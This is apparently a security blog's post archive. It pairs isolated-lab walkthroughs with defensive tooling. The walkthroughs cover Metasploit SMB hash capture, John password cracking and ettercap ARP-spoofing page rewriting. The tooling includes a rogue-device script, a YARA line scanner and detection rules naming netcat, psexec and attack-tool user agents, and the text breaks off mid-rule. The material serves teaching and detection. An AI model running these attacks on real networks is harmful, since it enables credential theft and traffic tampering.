Friday, December 27, 2019
metasploit smb capture password hashes
create 2 vms in virtualbox
1.) kali linux ATTACKER
will be used to run the metasploit smb capture module and record the victim's authentication attempt
2.) windows VICTIM
will be the victim trying to connect to the attacker's share
steps
-------
1.) set the Network tab of both virtualbox vms to "Internal Network" with the same network name
2.) power up both
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux ATTACKER with an ip address in the same range as windows
ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) ping each other from within each virtual machine to ensure connectivity
6.) on kali linux ATTACKER system start the metasploit smb capture module
> msfconsole
msf> use auxiliary/server/capture/smb
msf> set CAINPWFILE /tmp/cain.pw1
msf> set JOHNPWFILE /tmp/john.txt
msf> exploit
7.) on windows VICTIM system open windows explorer and try to connect to the attacker box
\\169.254.18.2\
windows will pop up an authentication prompt, enter a user & password (e.g. guy, password)
8.) on kali linux ATTACKER system metasploit should inform you it captured a hash and saved it to /tmp/john.txt (the file actually written carries a suffix for the hash type, e.g. /tmp/john.txt_netntlmv2)
type exit to exit metasploit
run john against the newly captured file
> john /tmp/john.txt_netntlmv2 --wordlist /usr/share/wordlists/rockyou.txt
if it's a weak password (like 'password') john should crack it quickly and display it on the screen
compare dhcp leases to active directory pcs
python script
# 1st get a list of all dhcp leased unique hostnames (from dhcp logs) and put into dhcp.csv
# 2nd get a list of all active directory computers and save it in ad.csv by running this powershell
# Get-ADComputer -Filter * |select name > ad.csv
# then run this python to compare and find the potentially rogue devices
adFile = r'ad.csv'
dhcpFile = r'dhcp.csv'
noADfile = r'notInAD.csv'
with open(dhcpFile, 'r') as dhcpFileHandle, open(noADfile, 'w') as notInADHandle:
    notInADCount = 0
    searchedCount = 0
    for dhcpHost in dhcpFileHandle:
        dhcpHost = dhcpHost.lower().strip()
        if not dhcpHost:
            continue  # skip blank lines so they are not reported as rogue hosts
        foundIt = 0
        # re-read the AD export for every DHCP host (simple, fine for a few thousand names)
        with open(adFile, 'r') as adFileHandle:
            for adHost in adFileHandle:
                adHost = adHost.lower().strip()
                if dhcpHost == adHost:
                    foundIt = 1
                    break
        searchedCount = searchedCount + 1
        if foundIt == 0:
            # one hostname per line; the newline was stripped above, so do not suppress it here
            print(dhcpHost, file=notInADHandle)
            notInADCount = notInADCount + 1
print("%s not in Active Directory, Searched %s DHCP Leases" % (str(notInADCount), str(searchedCount)))
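The script above expects dhcp.csv to already hold one hostname per line but does not show how to get from the DHCP logs to that list, nor that the PowerShell export begins with a "name" header and a "----" underline. The following added example (not the page's script) does both steps in memory: it pulls lease events out of a constructed Windows DHCP server audit-log excerpt (assumed field layout ID,Date,Time,Description,IP Address,Host Name,MAC Address, with event IDs 10 and 11 for lease assign and renew), normalises names (lower-case, FQDN cut down to the short computer name that AD stores) and diffs them against a constructed ad.csv.

```python
import csv
import io

# Constructed Windows DHCP audit-log excerpt (field layout is an assumption for this example)
DHCP_LOG = (
    "ID,Date,Time,Description,IP Address,Host Name,MAC Address\n"
    "00,12/27/19,00:00:01,Started,,,\n"
    "10,12/27/19,08:01:02,Assign,192.168.1.50,WS-FINANCE-01.corp.example,00AABBCCDD01\n"
    "11,12/27/19,08:15:30,Renew,192.168.1.50,ws-finance-01.corp.example,00AABBCCDD01\n"
    "10,12/27/19,09:02:11,Assign,192.168.1.51,laptop-guest,00AABBCCDD02\n"
    "10,12/27/19,09:40:00,Assign,192.168.1.52,PRINTER-3F,00AABBCCDD03\n"
    "10,12/27/19,10:05:45,Assign,192.168.1.53,,00AABBCCDD04\n"
)

# Constructed ad.csv, shaped like `Get-ADComputer -Filter * | select name > ad.csv` output
AD_EXPORT = "\nname\n----\nWS-FINANCE-01\nPRINTER-3F\nDC01\n\n"

LEASE_EVENTS = {"10", "11"}  # assign / renew


def dhcp_hostnames(log_text):
    """Return the set of normalised (lower-case, short) hostnames that received a lease."""
    names = set()
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) < 6 or row[0] not in LEASE_EVENTS:
            continue  # header, server start/stop, or malformed line
        host = row[5].strip().lower().split(".")[0]  # FQDN -> short computer name
        if host:  # leases without a hostname cannot be matched to an AD object
            names.add(host)
    return names


def ad_hostnames(export_text):
    """Return the computer names from the PowerShell export, skipping its header lines."""
    names = set()
    for line in export_text.splitlines():
        name = line.strip().lower()
        if not name or name == "name" or set(name) == {"-"}:
            continue
        names.add(name)
    return names


def not_in_ad(log_text, export_text):
    """Hostnames that took a DHCP lease but have no matching AD computer object."""
    return sorted(dhcp_hostnames(log_text) - ad_hostnames(export_text))


if __name__ == "__main__":
    for host in not_in_ad(DHCP_LOG, AD_EXPORT):
        print("%s not in Active Directory" % host)
```

When reading a real ad.csv, note that Windows PowerShell's `>` redirection writes UTF-16 by default, so either open the file with `encoding="utf-16"` or export it with `Out-File -Encoding ascii` instead; otherwise every comparison silently fails and every lease looks rogue.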
ettercap http replace man-in-the-middle full example
create 3 vms in virtualbox
1.) kali linux ATTACKER
will be used to run ettercap and perform man-in-the-middle
2.) kali linux WEB SERVER
will be hosting the website the victim wants to access
3.) windows VICTIM
will be the victim trying to access the web server
steps
-------
1.) set the Network tab of all 3 virtualbox vms to "Internal Network" with the same network name
2.) power up all 3
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux WEB SERVER with an ip address in the same range as windows
ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) configure kali linux ATTACKER with an ip address in the same range as windows
ifconfig eth0 169.254.18.3 netmask 255.255.0.0 up
6.) ping every other system from within each virtual machine to ensure connectivity
7.) on kali linux WEB SERVER create an index.html file that simply says "hello world this is fun exciting stuff"
then launch the python simple http server on port 8001
python -m SimpleHTTPServer 8001
8.) on windows VICTIM open microsoft edge and navigate to the website
http://169.254.18.2:8001/
you will see the text
"this is fun"
9.) on kali linux ATTACKER
create an ettercap filter file with a text editor with this content and save it as "fun.filter"
if (ip.proto == TCP) {
    if (tcp.dst == 8001 || tcp.src == 8001) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Nothing!");
            msg("removed encoding");
        }
        if (search(DATA.data, "fun")) {
            replace("fun", "evil");
            msg("fun is now evil");
        }
    }
}
NOTE: the Accept-Encoding replacement above is important: without it the server may gzip the response, so the html is not clear text and the "fun" replace never matches. Matching both tcp.src and tcp.dst against 8001 is important too, so the filter sees the request (where Accept-Encoding is) as well as the response (where the page text is). This only works because the lab traffic is plain http; over https the filter could neither read nor rewrite the page.
next compile the filter
etterfilter fun.filter -o fun.ef
next run ettercap using the filter and arp spoofing
ettercap -tq -M arp:remote -F fun.ef /169.254.18.1-3// /169.254.18.1-3//
10.) on windows VICTIM
reload the website
http://169.254.18.2:8001/
you will now see the text
"this is evil"
11.) on kali linux ATTACKER hit the "q" key to remove the arp poisoning and exit
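From the defender's side, the arp:remote poisoning in this lab leaves two traces in the ARP traffic: the victim's and the web server's IPs suddenly resolve to a different MAC, and that one MAC (the attacker's) ends up answering for several IPs. The following added example (not part of the original post, and not ettercap's code) checks a sequence of ARP reply records for both symptoms; the records are constructed to mirror the three lab hosts and the MAC addresses are made up.

```python
from collections import defaultdict

# Constructed ARP reply records (sender_ip, sender_mac) in arrival order, modelled on
# the lab's three hosts; the MAC addresses are made up for this example.
ARP_REPLIES = [
    ("169.254.18.1", "08:00:27:aa:aa:01"),  # windows VICTIM
    ("169.254.18.2", "08:00:27:bb:bb:02"),  # kali WEB SERVER
    ("169.254.18.3", "08:00:27:cc:cc:03"),  # kali ATTACKER
    ("169.254.18.1", "08:00:27:aa:aa:01"),  # normal refresh, nothing changes
    ("169.254.18.1", "08:00:27:cc:cc:03"),  # attacker's MAC now answers for the victim's IP
    ("169.254.18.2", "08:00:27:cc:cc:03"),  # ... and for the web server's IP
]


def detect_arp_spoofing(replies):
    """Return alert strings for IP->MAC changes and for MACs that claim several IPs.

    Both symptoms appear during arp:remote poisoning: the attacker's MAC replaces the
    real MAC for each target IP, and ends up bound to every IP it intercepts.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append("%s changed from %s to %s" % (ip, previous, mac))
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append("%s claims %d addresses: %s"
                              % (mac, len(mac_to_ips[mac]), ", ".join(sorted(mac_to_ips[mac]))))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_REPLIES):
        print("ALERT:", alert)
```

In a real network the records would come from a sniffer or from periodic `arp -a` snapshots, and a MAC change is not proof of an attack by itself: a replaced NIC, a DHCP address reassignment or a first-hop redundancy protocol (VRRP/HSRP) produce the same symptom, so alerts are worth correlating with the DHCP lease log before acting on them.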
Monday, December 23, 2019
update datetime on linux
# ntpdate 2.us.pool.ntp.org
syncs with internet time
navigator DOM keys
document.write("navigator.appName = " + navigator.appName + "<br/>");
document.write("navigator.appCodeName = " + navigator.appCodeName + "<br/>");
document.write("navigator.appVersion = " + navigator.appVersion + "<br/>");
document.write("navigator.platform = " + navigator.platform + "<br/>");
document.write("navigator.vendor = " + navigator.vendor + "<br/>");
document.write("navigator.vendorSub = " + navigator.vendorSub + "<br/>");
document.write("navigator.buildID = " + navigator.buildID + "<br/>");
document.write("navigator.oscpu = " + navigator.oscpu + "<br/>");
document.write("navigator.product = " + navigator.product + "<br/>");
document.write("navigator.productSub = " + navigator.productSub + "<br/>");
-----------------
sample output
-----------------
Google Chrome on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
navigator.platform = Win32
navigator.vendor = Google Inc.
navigator.vendorSub =
navigator.buildID = undefined
navigator.oscpu = undefined
navigator.product = Gecko
navigator.productSub = 20030107
-----------------
Internet Explorer on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0; rv:11.0) like Gecko
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub = undefined
-----------------
Microsoft Edge on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub =
-----------------
Firefox ESR on 64bit Kali Linux
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (X11)
navigator.platform = Linux x86_64
navigator.vendor =
navigator.vendorSub =
Friday, December 20, 2019
Virtual Box local contained lab, VM to VM
network for both kali & windows
"internal network"
on kali type
ifconfig eth0 169.254.18.XXX netmask 255.255.0.0 up
on kali
ping windows
on windows
ping kali
Thursday, December 5, 2019
yaraOneLiner.py
# Run Yara Rules against a file ONE LINE AT A TIME instead of against the whole file
import subprocess
import argparse

yaraParams = "-s"                    # -s prints each matched string with its offset
tempFileName = "yaraOneLiner.tmp"    # every input line is written here and scanned on its own
lineNumber = 1
output = b""

arguments = argparse.ArgumentParser("yaraOneLine.py -e yara64.exe -f input.csv -r rule.yar")
arguments.add_argument("-e", "--yaraExe", type=str, required=True, help="Yara executable to use")
arguments.add_argument("-f", "--inputFileName", type=str, required=True, help="Input file to yara scan")
arguments.add_argument("-r", "--yaraRuleFile", type=str, required=True, help="Yara rule file to scan against")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-s", "--status", action="store_true", required=False, help="Enable status tracking for large files")
settings = arguments.parse_args()

with open(settings.inputFileName, "r") as lines:
    for line in lines:
        line = line.rstrip()
        if settings.debug:
            print("\r\n---\r\nLINE %s: %s" % (str(lineNumber), line))
        if settings.status:
            if (lineNumber % 50) == 0 and lineNumber != 0:
                print("STATUS: processing line %s" % (str(lineNumber)))
        with open(tempFileName, "w") as tempfile:
            tempfile.write(line)
        # argument list instead of a shell string: file names containing spaces or shell
        # metacharacters are passed through literally instead of being interpreted by a shell
        yaraCommand = [settings.yaraExe, yaraParams, settings.yaraRuleFile, tempFileName]
        try:
            if settings.debug:
                print("ABOUT TO RUN: %s" % " ".join(yaraCommand))
                pause = input()
                print("STARTED: YARA")
            output = subprocess.check_output(yaraCommand)
            if settings.debug:
                print("OUTPUT: %s" % str(output))
        except Exception as e:
            error = str(e)
            print("COMMAND: %s" % " ".join(yaraCommand))
            print("OUTPUT: %s" % output)
            print("ERROR: %s" % error)
            output = b""
        if output is None or len(output) == 0:
            if settings.debug:
                print("MATCHES: 0 (no output)")
        else:
            # decode the bytes yara wrote instead of str()-ing them, which keeps literal \r\n escapes
            text = output.decode("utf-8", errors="replace").rstrip()
            if tempFileName in text:
                if settings.debug:
                    print("MATCHES: 1+")
                print("MATCH LINE NUMBER %s:" % str(lineNumber))
                print(" LINE: %s" % line)
                print(" YARA:")
                for row in text.splitlines():
                    if row.startswith("0x"):
                        print("   %s" % row)   # offset:$identifier: matched data
                    else:
                        print("  %s" % row)    # "<rule> <file>" header line
            else:
                print("MATCHES: 0 (with output)")
        lineNumber = lineNumber + 1
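yaraOneLiner.py only checks whether the temp file name appears in yara's output and then prints the raw rows. The following added example (not the page's script) parses the `-s` output format instead, which prints a `<rule> <scanned file>` header followed by one `0x<offset>:$<identifier>: <data>` line per string match, into records that can be grouped per rule or joined back to the input line number. The sample output is constructed to look like a scan of the script's temp file against the Generic Triage rules on this page.

```python
import re
from dataclasses import dataclass

# One string-match line of `yara -s` output: hex offset, $identifier, matched data
MATCH_LINE = re.compile(r"^0x([0-9a-fA-F]+):(\$\w+):\s?(.*)$")


@dataclass
class StringMatch:
    rule: str
    offset: int
    identifier: str
    data: str


def parse_yara_s_output(raw, encoding="utf-8"):
    """Return StringMatch records from the bytes yara wrote to stdout with -s."""
    text = raw.decode(encoding, errors="replace")
    matches = []
    current_rule = None
    for line in text.splitlines():  # handles \r\n on Windows and \n elsewhere
        if not line.strip():
            continue
        m = MATCH_LINE.match(line)
        if m and current_rule is not None:
            matches.append(StringMatch(current_rule, int(m.group(1), 16), m.group(2), m.group(3)))
        else:
            # "<rule> <file>" header: rule names cannot contain spaces, file names can
            current_rule = line.split(" ", 1)[0]
    return matches


def matches_by_rule(matches):
    """Group StringMatch records by the rule that produced them."""
    grouped = {}
    for m in matches:
        grouped.setdefault(m.rule, []).append(m)
    return grouped


# Constructed sample: two of the page's triage rules hit the one-line temp file
SAMPLE_OUTPUT = (
    b"RemoteControlUrlAccessed yaraOneLiner.tmp\r\n"
    b"0x1f:$string0: teamviewer\r\n"
    b"CloudFileStorageUrlAccessed yaraOneLiner.tmp\r\n"
    b"0x3a:$string0: dropbox.com\r\n"
    b"0x52:$string9: mega.nz\r\n"
)


if __name__ == "__main__":
    for rule, hits in matches_by_rule(parse_yara_s_output(SAMPLE_OUTPUT)).items():
        print(rule)
        for h in hits:
            print("  offset %d %s = %r" % (h.offset, h.identifier, h.data))
```

Inside yaraOneLiner.py the parser would be called on the `output` bytes returned by `subprocess.check_output`; an empty list means no rule fired for that line, and `matches_by_rule` gives the per-rule view that a triage report usually wants.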
Neo23x0 Sigma Proxy Rules converted to simple Yara
rule Neo23x0SigmaUserAgentMatch
{
meta:
author = "@neonprimetime"
description = "@Neo23x0 Proxy User Agent Rules https://github.com/Neo23x0/sigma/tree/master/rules/proxy"
strings:
$string1 = "(compatible;MSIE"
$string2 = "BFAC"
$string3 = "BGroom"
$string4 = "CholTBAgent"
$string5 = "Havij"
$string7 = "adlib/"
$string8 = "arachni/"
$string9 = "asd"
$string10 = "brutus"
$string11 = "cgichk"
$string12 = "changhuatong"
$string13 = "crimscanner/"
$string14 = "inspath"
$string15 = "mdms"
$string16 = "metis"
$string17 = "pxyscand"
$string18 = "tiny"
$string19 = "vega/"
$string20 = "whcc/"
$string21 = "zmeu"
$string22 = "(Charon; Inferno)"
$string23 = "(hydra)"
$string24 = ".0;Windows NT"
$string25 = "<|>"
$string26 = "Bot"
$string27 = "Microsoft Internet Explorer"
$string28 = "Telegram"
$string29 = "absinthe"
$string30 = "bsqlbf"
$string31 = "core-project/1.0"
$string32 = "datacha0s"
$string33 = "dirbuster"
$string34 = "domino hunter"
$string35 = "dotdotpwn"
$string36 = "exploit"
$string37 = "floodgate"
$string38 = "get-minimal"
$string39 = "gootkit auto-rooter scanner"
$string40 = "grendel-scan"
$string41 = "internet ninja"
$string42 = "jaascois"
$string43 = "masscan"
$string44 = "morfeus fucking scanner"
$string45 = "mysqloit"
$string46 = "n-stealth"
$string47 = "nsauditor"
$string48 = "pangolin"
$string49 = "pmafind"
$string50 = "security scan"
$string51 = "springenwerk"
$string52 = "sql power injector"
$string53 = "sqlmap"
$string54 = "sqlninja"
$string55 = "teh forest lobster"
$string56 = "toata dragostea"
$string57 = "uil2pn"
$string58 = "voideye"
$string59 = "webshag"
$string60 = "webvulnscan"
$string61 = "wordpress hash grabber"
$string62 = "zeroup"
$string63 = "AutoIt"
$string64 = "CertUtil URL Agent"
$string65 = "DotDotPwn v2.1"
$string66 = "FHScan Core"
$string67 = "HttpBrowser/1.0"
$string68 = "IczelionDownLoad"
$string69 = "Internet Explorer"
$string75 = "Moxilla"
$string78 = "Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"
$string79 = "Mozilla v5.1"
$string80 = "Mozilla/1.0"
$string81 = "Mozilla/2.0"
$string83 = "Mozilla/4.0 (compatible; MSI 6.0;"
$string84 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)"
$string85 = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
$string86 = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
$string87 = "Mozilla/4.0 (compatible; MSIE 6.0; DynGate)"
$string88 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
$string89 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
$string90 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)"
$string91 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
$string92 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
$string93 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
$string94 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
$string95 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
$string96 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR = {7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N"
$string97 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
$string98 = "Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)"
$string99 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
$string100 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)"
$string101 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
$string102 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
$string103 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"
$string104 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)"
$string105 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
$string106 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)"
$string107 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)"
$string108 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)"
$string109 = "Mozilla/4.0 (compatible; Metasploit RSPEC)"
$string110 = "Mozilla/4.0 (compatible; RMS)"
$string111 = "Mozilla/4.0 (compatible; SPIPE/1.0"
$string112 = "Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)"
$string114 = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)"
$string115 = "Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)"
$string117 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)"
$string118 = "Mozilla/5.0 (Windows NT 5.1 ; v."
$string119 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
$string120 = "Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko"
$string121 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0"
$string122 = "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/"
$string123 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
$string124 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
$string125 = "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0"
$string126 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2"
$string127 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0"
$string128 = "Mozilla/5.0 (Windows NT 9;"
$string129 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13"
$string130 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1"
$string131 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)"
$string132 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)"
$string133 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
$string134 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200"
$string135 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7"
$string136 = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
$string137 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0"
$string138 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
$string139 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)"
$string140 = "Mozilla/5.0 WinInet"
$string142 = "Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)"
$string143 = "Netscape"
$string144 = "O/9.27 (W; U; Z)"
$string146 = "Opera/8.81 (Windows NT 6.0; U; en)"
$string147 = "RookIE/1.0"
$string148 = "SIPDROID"
$string149 = "SJZJ (compatible; MSIE 6.0; Win32)"
$string150 = "Sametime Community Agent"
$string151 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC"
$string152 = "Wget/1.9+cvs-stable (Red Hat modified)"
$string154 = "X-FORWARDED-FOR"
$string155 = "XMRig"
$string157 = "backdoorbot"
$string158 = "ccminer"
$string159 = "hots scot"
$string160 = "nocase"
$string161 = "nsis_inetc (mozilla)"
$string162 = "ruler"
$string163 = "sample"
$string164 = "user-agent"
condition:
1 of them
}
Labels:
Florian Roth,
Neo23x0,
Sigma,
UA,
User Agent,
UserAgent,
yara
Generic Triage Yara Rules
rule RemoteControlUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Cloud Remote Control Url Accessed"
strings:
$string0 = "teamviewer" nocase
$string1 = "splashtop" nocase
$string2 = "ammyy" nocase
$string3 = "mikogo" nocase
$string4 = "uvnc" nocase
$string5 = "gbchcmhmhahfdphkhkmpfmihenigjmpp" nocase
$string6 = "logmein" nocase
$string7 = "join.me" nocase
$string8 = "realvnc" nocase
$string9 = "dameware" nocase
$string10 = "dwservice" nocase
$string11 = "anydesk" nocase
condition:
1 of them
}
rule WebMailUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Web Mail Url Accessed"
strings:
$string0 = "mail.yahoo.com" nocase
$string1 = "@gmail.com" nocase
$string2 = "outlook.live.com" nocase
$string3 = "mail.protonmail.com" nocase
$string4 = "zoho.com" nocase
$string5 = "yandex.com" nocase
$string6 = "tutanota.com" nocase
$string7 = "kolbanow.com" nocase
$string8 = "fastmail.com" nocase
$string10 = "posteo.de" nocase
$string11 = "startmail.com" nocase
$string12 = "runbox.com" nocase
$string13 = "mailfence.com" nocase
$string14 = "countermail.com" nocase
condition:
1 of them
}
rule CloudFileStorageUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Cloud File Storage Url Accessed"
strings:
$string0 = "dropbox.com" nocase
$string1 = "drive.google.com" nocase
$string2 = "wetransfer.com" nocase
$string3 = "pcloud.com" nocase
$string4 = "tresorit.com" nocase
$string5 = "sync.com" nocase
$string6 = "onedrive.live.com" nocase
$string7 = ".box.com" nocase
$string8 = "spideroak.com" nocase
$string9 = "mega.nz" nocase
$string10 = "jottacloud.com" nocase
$string11 = "teamdrive.com" nocase
$string12 = "mediafire.com" nocase
$string13 = "cloudup.com" nocase
$string14 = "cloudme.com" nocase
condition:
1 of them
}
rule LateralMovementAttempt
{
meta:
author = "@neonprimetime"
description = "Lateral Movement Attempt"
strings:
$string0 = "mstsc" nocase
$string1 = "psexec" nocase
$string2a = "\\nc.exe" nocase
$string3a = "/nc.exe" nocase
$string2b = "\\nc64.exe" nocase
$string3b = "/nc64.exe" nocase
$string2c = "\\netcat.exe" nocase
$string3c = "/netcat.exe" nocase
$string4 = "putty.exe" nocase
$string5 = "mobax" nocase
$string6 = "securecrt" nocase
$string7 = "ssh.exe" nocase
$string8 = "winrs" nocase
condition:
1 of them
}
rule ShortExecutableName
{
meta:
author = "@neonprimetime"
description = "Short Executable Name"
strings:
$string0 = "/0.exe" nocase
$string1 = "/1.exe" nocase
$string2 = "/2.exe" nocase
$string3 = "/3.exe" nocase
$string4 = "/4.exe" nocase
$string5 = "/5.exe" nocase
$string6 = "/6.exe" nocase
$string7 = "/7.exe" nocase
$string8 = "/8.exe" nocase
$string9 = "/9.exe" nocase
$string10 = "\\0.exe" nocase
$string11 = "\\1.exe" nocase
$string12 = "\\2.exe" nocase
$string13 = "\\3.exe" nocase
$string14 = "\\4.exe" nocase
$string15 = "\\5.exe" nocase
$string16 = "\\6.exe" nocase
$string17 = "\\7.exe" nocase
$string18 = "\\8.exe" nocase
$string19 = "\\9.exe" nocase
$string20 = "/a.exe" nocase
$string21 = "/b.exe" nocase
$string22 = "/c.exe" nocase
$string23 = "/d.exe" nocase
$string24 = "/e.exe" nocase
$string25 = "/f.exe" nocase
$string26 = "/g.exe" nocase
$string27 = "/h.exe" nocase
$string28 = "/i.exe" nocase
$string29 = "/j.exe" nocase
$string30 = "/k.exe" nocase
$string31 = "/l.exe" nocase
$string32 = "/m.exe" nocase
$string33 = "/n.exe" nocase
$string34 = "/o.exe" nocase
$string35 = "/p.exe" nocase
$string36 = "/q.exe" nocase
$string37 = "/r.exe" nocase
$string38 = "/s.exe" nocase
$string39 = "/t.exe" nocase
$string40 = "/u.exe" nocase
$string41 = "/v.exe" nocase
$string42 = "/w.exe" nocase
$string43 = "/x.exe" nocase
$string44 = "/y.exe" nocase
$string45 = "/z.exe" nocase
$string46 = "\\a.exe" nocase
$string47 = "\\b.exe" nocase
$string48 = "\\c.exe" nocase
$string49 = "\\d.exe" nocase
$string50 = "\\e.exe" nocase
$string51 = "\\f.exe" nocase
$string52 = "\\g.exe" nocase
$string53 = "\\h.exe" nocase
$string54 = "\\i.exe" nocase
$string55 = "\\j.exe" nocase
$string56 = "\\k.exe" nocase
$string57 = "\\l.exe" nocase
$string58 = "\\m.exe" nocase
$string59 = "\\n.exe" nocase
$string60 = "\\o.exe" nocase
$string61 = "\\p.exe" nocase
$string62 = "\\q.exe" nocase
$string63 = "\\r.exe" nocase
$string64 = "\\s.exe" nocase
$string65 = "\\t.exe" nocase
$string66 = "\\u.exe" nocase
$string67 = "\\v.exe" nocase
$string68 = "\\w.exe" nocase
$string69 = "\\x.exe" nocase
$string70 = "\\y.exe" nocase
$string71 = "\\z.exe" nocase
condition:
1 of them
}
rule PolicyViolation
{
meta:
author = "@neonprimetime"
description = "Policy Violation"
strings:
$string0 = "disableuac" nocase
condition:
1 of them
}
rule LivingOffLandCommand
{
